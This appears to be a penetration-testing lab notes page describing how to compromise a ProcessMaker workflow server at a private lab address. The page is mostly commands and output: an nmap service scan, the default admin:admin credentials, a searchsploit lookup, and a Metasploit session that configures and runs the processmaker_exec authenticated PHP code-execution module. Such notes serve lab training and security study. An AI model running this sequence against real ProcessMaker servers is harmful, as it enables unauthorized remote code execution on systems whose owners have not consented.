Workflow platform(Processmaker)

Exploit a vulnerable ProcessMaker server with Metasploit

nmap -sS -sV 10.2.27.1

80/tcp    open  http               Apache httpd 2.2.23 ((Win32) PHP/5.2.14)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql              MySQL (unauthorized)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Enumeration

Explore the web application hosted on the web server, before running any vuln scanners

firefox 10.2.27.1

View the web page source code. In this case no version information can be found.
Search online for ProcessMaker default credentials
- admin:admin

Exploitation

searchsploit ProcessMaker
# Try "ProcessMaker Open Source - (Authenticated) PHP Code Execution (Metasploit)"

cd Desktop
searchsploit -m 29325
less 29325.rb
rm 29325.rb
# In this case a Metasploit module will be used

service postgresql start && msfconsole -q

db_status
setg RHOSTS 10.2.27.1
setg RHOST 10.2.27.1
workspace -a ProcessMaker

search ProcessMaker
use exploit/multi/http/processmaker_exec
options
set USERNAME admin
set PASSWORD admin
run

PreviousMySQL NextSun GlassFish

Last updated 1 year ago